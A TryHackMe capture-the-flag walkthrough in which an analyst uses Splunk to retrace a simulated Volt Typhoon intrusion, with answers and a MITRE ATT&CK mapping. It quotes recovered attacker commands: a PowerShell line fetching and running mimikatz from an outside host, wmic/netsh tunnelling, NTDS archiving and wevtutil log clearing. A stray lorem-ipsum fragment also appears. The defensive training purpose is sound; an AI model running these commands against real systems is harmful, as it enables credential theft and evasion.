Volt Typhoon

TryHackMe Challenge Walkthrough

Challenge Overview

The SOC has detected suspicious activity indicative of an advanced persistent threat (APT) group known as Volt Typhoon, notorious for targeting high-value organizations. Assume the role of a security analyst and investigate the intrusion by retracing the attacker’s steps.

You have been provided with various log types from a two-week time frame during which the suspected attack occurred. Your ability to research the suspected APT and understand how they maneuver through targeted networks will prove to be just as important as your Splunk skills.

Threat Analysis Summary

Analyst Summary Report

Incident Title

Volt Typhoon APT Intrusion via ADSelfService Exploit

Detection Source

ADSelfService Logs, PowerShell Logs, WMIC Events, Registry Queries

Investigation Workflow

Credential Hijack Detection
- Reviewed ADSelfService Plus logs and identified a password change on the dean-admin account.
- Found successful password change from external IP, followed by failed attempts — a clear sign of takeover.
Account Creation & Privilege Escalation
- Detected creation of voltyp-admin via PowerShell and WMIC logs.
- Confirmed the new account had administrative privileges.
Living-off-the-Land Execution
- Investigated use of WMIC for:
  - AD DB dumping (ntdsutil)
  - File transfers and compression using xcopy, 7z
  - Proxy configuration via netsh
- Tracked file movements to web server directories.
Web Shell Deployment & Persistence
- Identified use of certutil to deploy iisstart.aspx web shell.
- Observed lateral movement and redeployment under AuditReport.jspx.
Credential Access
- Detected download and execution of Mimikatz via encoded PowerShell.
- Registry queries for _OpenSSH, putty, and realvnc confirmed targeting of stored credentials.
Data Collection & Exfiltration
- Confirmed sensitive financial files (2022.csv, 2023.csv, 2024.csv) were copied for staging.
- Detected renaming of exfil archive to .gif for obfuscation.
Defense Evasion & Cleanup
- Detected PowerShell commands wiping MRU and clearing logs via wevtutil.
- Verified use of Remove-ItemProperty and log deletion across 4 log categories.

Recommendations

Patch exposed apps
- The attack started through a vulnerable service. Keep external apps updated.
Harden admin accounts
- Use strong credentials and enable MFA on privileged accounts.
Log command-line activity
- Enable and monitor PowerShell, WMIC, and netsh logging.
Monitor file uploads
- Watch for unusual uploads or renamed files in temp/web folders.
Alert on suspicious registry access
- Detect access to tools storing creds like Putty or RealVNC.
Protect your logs
- Restrict log deletion and back up regularly to catch cleanup attempts.

Tools Used

Splunk – Log analysis and event correlation
CyberChef – Decoding Base64 payloads
MITRE ATT&CK Navigator – Mapping observed techniques

Key Evidences

ADSelfService logs showing the password change of dean-admin
PowerShell logs indicating use of Mimikatz via encoded command
WMIC execution across nodes (xcopy, 7z, ntdsutil, etc.)
Proxy setup using netsh to 10.2.30.1:8443
Registry access to credential-related tools (Putty, OpenSSH, RealVNC)
Event log clearing using wevtutil cl
Web shell staging in C:\Windows\Temp\ and lateral movement via AuditReport.jspx

Chain Attack Overview

Initial Access

Exploited ADSelfService Plus vulnerability to compromise dean-admin

Execution

Used WMIC to run PowerShell and native binaries (xcopy, 7z, ntdsutil)

Persistence

Deployed web shells (iisstart.aspx, AuditReport.jspx)

Privilege Escalation

Created new admin account voltyp-admin

Defense Evasion

Used Remove-ItemProperty, renamed archives, and cleared logs with wevtutil

Discovery

Queried registry and event logs for virtualization and logon patterns

Credential Access

Executed Mimikatz; accessed registry for credential tools

Exfiltration

Compressed and renamed data; staged in web server directory

Command & Control

Set up proxy with netsh to 10.2.30.1:8443

Impact

Credentials dumped, sensitive files copied, logs deleted, persistence established

MITRE ATT&CK Mapping

Phase	ID	Technique	Description
Initial Access	T1190	Exploit Public-Facing Application	ADSelfService Plus exploited
Execution	T1047	Windows Management Instrumentation (WMIC)	Used WMIC for command execution and remote process creation
Execution	T1059.001	Command and Scripting Interpreter: PowerShell	PowerShell used to execute and obfuscate commands
Persistence	T1505.003	Server Software Component: Web Shell	Planted encoded web shell in C:\Windows\Temp\|
Persistence	T1136	Create Account	Created voltyp-admin admin account
Defense Evasion	T1070.001	Clear Windows Event Logs	Used wevtutil cl to clear logs (Application, Security, etc.)
Defense Evasion	T1027	Obfuscated Files or Information	Encoded payloads and obfuscated archive rename
Credential Access	T1003.003	OS Credential Dumping: NTDS	Used ntdsutil to dump AD database
Credential Access	T1552.004	Unsecured Credentials: Private Keys and Configs	Queried registry for VNC, PuTTY, OpenSSH
Discovery	T1082	System Information Discovery	Queried drive and network interface info via WMIC
Discovery	T1012	Query Registry	Used PowerShell to check virtualization keys in registry
Discovery	T1033	System Owner/User Discovery	Used whoami and other identity recon
Collection	T1560.001	Archive Collected Data	Used 7z to compress database with password protection
Exfiltration	T1048.003	Exfiltration Over Alternative Protocol: Custom Protocol	Exfiltrated data via proxy connection using renamed .gif file
C2	T1090.001	Proxy: Internal Proxy	Used netsh to create local port proxy to remote address

Reference: [MITRE ATT&CK Navigator] ( https://attack.mitre.org/ )

Q & A

INITIAL ACCESS

Volt Typhoon often gains initial access to target networks by exploiting vulnerabilities in enterprise software. In recent incidents, Volt Typhoon has been observed leveraging vulnerabilities in Zoho ManageEngine ADSelfService Plus, a popular self-service password management solution used by organizations.

Q1 Comb through the ADSelfService Plus logs to begin retracing the attacker’s steps. At what time (ISO 8601 format) was Dean's password changed and their account taken over by the attacker?

So we start as suggested to filter for soucerype adss and then for username Dean

We dont have many field in general to play with, but we can make our table more clear with the few available
For this question are interesting the fields action_name and status

So lets check for password change

Splunk Query:

index=* sourcetype=adss username="dean-admin" action_name="Password Change"

Two results, and we can see that we had a completed password changed followed by a failed one, i guess our attacker unlocked the account, changed the password later on Dean-Admin wasn’t able anymore to modify it.

To be sure we can check for nearby event, especially from the same ip address who changed the pw and check if there were failed attempt before, classic of account takeover pattern.

Answer

2024-03-24T11:10:22

Q2 Shortly after Dean's account was compromised, the attacker created a new administrator account. What is the name of the new account that was created?

Let’s look at the event after the password change (set after +5h)
Remove Dean from the query and select all the sourcetype (we need to see wmic and poweshell this time) we can easily see that a new admin account its been created

interesting new field is command

Splunk Query:

index=* sourcetype=*

Answer

voltyp-admin

EXECUTION

Volt Typhoon is known to exploit Windows Management Instrumentation Command-line (WMIC) for a range of execution techniques. They leverage WMIC for tasks such as gathering information and dumping valuable databases, allowing them to infiltrate and exploit target networks. By using “living off the land” binaries (LOLBins), they blend in with legitimate system activity, making detection more challenging.
tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.

Q3 In an information gathering attempt, what command does the attacker run to find information about local drives on server01 & server02?

I would include in the query any command server (and ofc get) happened after the initial access, from the user dean-admin

And this is where it starts — the first wmic event sets the tone for what’s coming. From here, we can piece together the attacker’s activity step-by-step:

Copying the AD database dump

The attacker moves the dumped temp.dit file into a web-accessible directory:
wmic /node:webserver-01 process call create “cmd.exe /c xcopy C:\Windows\Temp\tmp\temp.dit \\webserver-01\c$\inetpub\wwwroot”

Compressing the file with a password

Using 7-Zip, they archive the file with a password and split it into 100MB volumes:
wmic /node:webserver-01 process call create “cmd.exe /c 7z a -v100m -p d5ag0nm@5t3r -t7z cisco-up.7z C:\inetpub\wwwroot\temp.dit”

Renaming the archive to bypass detection

The .7z file is disguised as a .gif to appear less suspicious:
wmic /node:webserver-01 process call create “cmd.exe /c ren \\webserver-01\c$\inetpub\wwwroot\cisco-up.7z cl64.gif”

Cleaning up evidence

The attacker wipes the C:\Windows\Temp` directory:
`wmic /node:webserver-01 process call create “cmd.exe rd /S C:\Windows\Temp”

Gathering system network configuration*

Basic NIC details and DHCP-related settings are retrieved:
wmic get MACAddress, IPAddress, DHCPEnabled, DHCPLeaseExpires, DHCPLeaseObtained, DHCPServer & nic get AdapterType, AutoSense, Name

Ensuring file sharing is enabled

The Server service (`LanmanServer`) is started to allow SMB access:
wmic service where “Name=’LanmanServer'” call startservice

Setting up a port forwarding rule (C2 staging)

A proxy tunnel is established to redirect traffic to the attacker’s listener:
wmic /node:server-01 /user:dean-admin /password:uNcr4cK4b1e process call create “cmd.exe /c netsh interface portproxy add v4tov4 listenport=50100 listenaddress=0.0.0.0 connectport=8443 connectaddress=10.2.30.1”

Removing the port forwarding rule (cleanup)

Once no longer needed, the tunnel is removed:
wmic /node:server-01 /user:dean-admin /password:uNcr4cK4b1e process call create “cmd.exe /c netsh interface portproxy delete v4tov4 listenport=50100 listenaddress=0.0.0.0”

Answer

wmic /node:server01, server02 logicaldisk get caption, filesystem, freespace, size, volumename

Q4 The attacker uses ntdsutil to create a copy of the AD database. After moving the file to a web server, the attacker compresses the database. What password does the attacker set on the archive?

Well this is an easy one, we already noticed in the screenshot before this event:

and ye -p is the password >D

Answer

d5ag0nm@5t3r

PERSISTENCE

Our target APT frequently employs web shells as a persistence mechanism to maintain a foothold. They disguise these web shells as legitimate files, enabling remote control over the server and allowing them to execute commands undetected.

Q5 To establish persistence on the compromised server, the attacker created a web shell using base64 encoded text. In which directory was the web shell placed?

We noticed before that the attacker was messing in the windows temp dir and we could go directly there but lets pretend we didn’t.

Check on mitre attack what this VOLT Typhoon does, and look in the mitre navigator what it says about persistence – web shell

So lets look for those 2 files (AuditReport.jspx and iisstart.aspx) and see what show up:

Splunk Query:

index=* sourcetype=*  iisstart.aspx

and we can see that the attacker is messing in windows\temp folder

If we wuery ntuser.ini we can easily find our code64 to feed to our beloved cyberchef

Answer

C:\Windows\Temp\

Q6 In an attempt to begin covering their tracks, the attackers remove evidence of the compromise. They first start by wiping RDP records. What PowerShell cmdlet does the attacker use to remove the “Most Recently Used” record?

So we query the sourcetype=powershell and we check for commandline with remove

Lets start with this query

Splunk Query:

index=* sourcetype=powershell
| table CommandLine
| dedup CommandLine

and we found our command, so now lets filter for Remove-ItemProperty and we can see that was used 3 times to remove records

Answer

Remove-ItemProperty

Q7 The APT continues to cover their tracks by renaming and changing the extension of the previously created archive. What is the file name (with extension) created by the attackers?

The archive is our cisco-up.7z we noticed before, and we already saw the action of renaming it with ren

wmic /node:webserver-01 process call create “cmd.exe /c ren \webserver-01\c$\inetpub\wwwroot\cisco-up.7z cl64.gif”

Answer

cl64.gif

Q8 Under what regedit path does the attacker check for evidence of a virtualized environment?

The registry on any Windows system contains the following five root keys:
1. HKEY_CURRENT_USER
2. HKEY_USERS
3. HKEY_LOCAL_MACHINE
4. HKEY_CLASSES_ROOT
5. HKEY_CURRENT_CONFIG

Let’s check for those with a command Get-ItemProperty

And with HKEY_LOCAL_MACHINE we find our answer

(note: we already saw the first time we set a table of the commandline, there was this one Get-ItemProperty -Path “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control”)

Answer

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

CREDENTIAL ACCESS

Volt Typhoon often combs through target networks to uncover and extract credentials from a range of programs. Additionally, they are known to access hashed credentials directly from system memory.

Q9 Using reg query, Volt Typhoon hunts for opportunities to find useful credentials. What three pieces of software do they investigate? (Answer Format: Alphabetical order separated by a comma and space.)

This is an easy one, we already have the command to look for (reg query)

Answer

OpenSSH, putty, realvnc

Q10 What is the full decoded command the attacker uses to download and run mimikatz?

If we search mimikatz nothing show up, so i guess its encoded somehow

Looking at the commandline table i created before, there is an -exec command

If i filter for this command i can find my encoded command

Splunk Query:

index=* sourcetype="powershell" CommandLine="-exec"

Now we just give it to cyberchef to decode it from Base64

Answer

Invoke-WebRequest -Uri “http://voltyp.com/3/tlz/mimikatz.exe” -OutFile “C:\Temp\db2\mimikatz.exe”; Start-Process -FilePath “C:\Temp\db2\mimikatz.exe” -ArgumentList @(“sekurlsa::minidump lsass.dmp”, “exit”) -NoNewWindow -Wait

DISCOVERY & LATERAL MOVEMENT

Discovery

Volt Typhoon uses enumeration techniques to gather additional information about network architecture, logging mechanisms, successful logins, and software configurations, enhancing their understanding of the target environment for strategic purposes.

Lateral Movement

The APT has been observed moving previously created web shells to different servers as part of their lateral movement strategy. This technique facilitates their ability to traverse through networks and maintain access across multiple systems.

Q11 The attacker uses wevtutil, a log retrieval tool, to enumerate Windows logs. What event IDs does the attacker search for?

Well just search for wevtutil and out of 12 result we can easily find our 3 event ID he is looking for

4624 – successful logon
4625 -failed logon
4769 – is generated every time the Key Distribution Center (KDC) receives a Kerberos Ticket Granting Service (TGS) ticket request

Answer

4624 4625 4769

Q12 Moving laterally to server-02, the attacker copies over the original web shell. What is the name of the new web shell that was created?

We saw before while looking for iisstart, the first command was certutil and the second one was copy-item.

Answer

AuditReport.jspx

COLLECTION

During the collection phase, Volt Typhoon extracts various types of data, such as local web browser information and valuable assets discovered within the target environment.

Q13 The attacker is able to locate some valuable financial information during the collection phase. What three files does Volt Typhoon make copies of using PowerShell?

In the commandline table we have copy-item, so just filter for this command

Answer

2022.csv 2023.csv 2024.csv

C2 & CLEANUP

Volt Typhoon utilizes publicly available tools as well as compromised devices to establish discreet command and control (C2) channels.

Cleanup

To cover their tracks, the APT has been observed deleting event logs and selectively removing other traces and artifacts of their malicious activities.

Q14 The attacker uses netsh to create a proxy for C2 communications. What connect address and port does the attacker use when setting up the proxy? Answer Format: IP Port

We can look for netsh and we find immediately our answer

Answer

10[.]2[.]30[.]1 8443

Q15 To conceal their activities, what are the four types of event logs the attacker clears on the compromised system?

So looking at MITRE navigator, another of their defense evasion technique is the clear of event logs.

Wevtutil.exe is often used to execute this technique and we already saw it was used by the attacker to get search for Event ID, let’s look for wevtutil

Splunk Query:

index=* sourcetype="powershell"  CommandLine=Wevtutil

and here we have our command line: wevtutil cl Application Security Setup System

Answer

Application Security Setup System

Conclusion

Volt Typhoon really went for the full playbook: webshells in Temp, password changes, file renaming, encoded PowerShell, event log wiping — the works. If subtlety were an Olympic sport, they’d at least medal.

They didn’t even bother hiding behind fancy malware. Just LOLBins, reg queries, and a bit of base64 — like it’s 2016 and no one’s watching.

The whole operation was a reminder that attackers don’t need zero-days when default logging is ignored and Windows Temp is treated like a black hole. Good job, Volt. Now please get out.